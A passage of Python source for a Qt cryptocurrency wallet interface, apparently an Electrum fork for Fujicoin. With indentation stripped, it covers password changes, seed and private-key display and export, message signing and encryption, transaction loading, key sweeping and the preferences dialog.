self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from electrum.storage import STO_EV_XPUB_PW
if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(str(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
tab = self.tabs.currentWidget()
#if hasattr(tab, 'searchable_list'):
# tab.searchable_list.toggle_toolbar()
#return
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
mpk_text.repaint() # macOS hack for #4777
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + f' {key+1} ( keystore: {keystore_types[key]} )'
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Fujicoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Fujicoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + str(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a fujicoin URI
if str(data).startswith("fujicoin:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
try:
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
except BaseException as e:
self.show_error((_('Could not decode QR code')+':\n{}').format(repr(e)))
return
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + str(e))
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {str(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
try:
coins, keypairs = sweep_preparations(get_pk(), self.network)
except Exception as e: # FIXME too broad...
self.show_message(str(e))
return
self.do_clear()
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(addr)
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
self.warn_if_watching_only()
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum.i18n import languages
lang_combo.addItems(list(languages.values()))
lang_keys = list(languages.keys())
lang_cur_setting = self.config.get("language", '')
try:
index = lang_keys.index(lang_cur_setting)
except ValueError: # not in list
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
msg = '\n'.join([
_('Time based: fee rate is based on average confirmation time estimates'),
_('Mempool based: fee rate is targeting a depth in the memory pool')
]
)
fee_type_label = HelpLabel(_('Fee estimation') + ':', msg)
fee_type_combo = QComboBox()
fee_type_combo.addItems([_('Static'), _('ETA'), _('Mempool')])
fee_type_combo.setCurrentIndex((2 if self.config.use_mempool_fees() else 1) if self.config.is_dynfee() else 0)
def on_fee_type(x):
self.config.set_key('mempool_fees', x==2)
self.config.set_key('dynamic_fees', x>0)
self.fee_slider.update()
fee_type_combo.currentIndexChanged.connect(on_fee_type)
fee_widgets.append((fee_type_label, fee_type_combo))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_adv_controls.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
use_rbf = self.config.get('use_rbf', True)
use_rbf_cb = QCheckBox(_('Use Replace-By-Fee'))
use_rbf_cb.setChecked(use_rbf)
use_rbf_cb.setToolTip(
_('If you check this box, your transactions will be marked as non-final,') + '\n' + \
_('and you will have the possibility, while they are unconfirmed, to replace them with transactions that pay higher fees.') + '\n' + \
_('Note that some merchants do not accept non-final transactions until they are confirmed.'))
def on_use_rbf(x):
self.config.set_key('use_rbf', bool(x))
batch_rbf_cb.setEnabled(bool(x))
use_rbf_cb.stateChanged.connect(on_use_rbf)
fee_widgets.append((use_rbf_cb, None))
batch_rbf_cb = QCheckBox(_('Batch RBF transactions'))
batch_rbf_cb.setChecked(self.config.get('batch_rbf', False))
batch_rbf_cb.setEnabled(use_rbf)
batch_rbf_cb.setToolTip(
_('If you check this box, your unconfirmed transactions will be consolidated into a single transaction.') + '\n' + \
_('This will save fees.'))
def on_batch_rbf(x):
self.config.set_key('batch_rbf', bool(x))
batch_rbf_cb.stateChanged.connect(on_batch_rbf)
fee_widgets.append((batch_rbf_cb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see https://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = base_units_list
msg = (_('Base unit of your wallet.')
+ '\n1 FJC = 1000 mFJC. 1 mFJC = 1000 bits. 1 bit = 100 sat.\n'
+ _('This setting affects the Send tab, and all balance related fields.'))
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
self.decimal_point = base_unit_name_to_decimal_point(unit_result)
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
colortheme_combo = QComboBox()
colortheme_combo.addItem(_('Light'), 'default')
colortheme_combo.addItem(_('Dark'), 'dark')
index = colortheme_combo.findData(self.config.get('qt_gui_color_theme', 'default'))
colortheme_combo.setCurrentIndex(index)
colortheme_label = QLabel(_('Color theme') + ':')
def on_colortheme(x):
self.config.set_key('qt_gui_color_theme', colortheme_combo.itemData(x), True)
self.need_restart = True
colortheme_combo.currentIndexChanged.connect(on_colortheme)
gui_widgets.append((colortheme_label, colortheme_combo))
updatecheck_cb = QCheckBox(_("Automatically check for software updates"))
updatecheck_cb.setChecked(self.config.get('check_updates', False))
def on_set_updatecheck(v):
self.config.set_key('check_updates', v == Qt.Checked, save=True)
updatecheck_cb.stateChanged.connect(on_set_updatecheck)
gui_widgets.append((updatecheck_cb, None))
filelogging_cb = QCheckBox(_("Write logs to file"))
filelogging_cb.setChecked(bool(self.config.get('log_to_file', False)))
def on_set_filelogging(v):
self.config.set_key('log_to_file', v == Qt.Checked, save=True)
self.need_restart = True
filelogging_cb.stateChanged.connect(on_set_filelogging)
filelogging_cb.setToolTip(_('Debug logs can be persisted to disk. These are useful for troubleshooting.'))
gui_widgets.append((filelogging_cb, None))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transactions fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
if len(choosers) > 1:
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
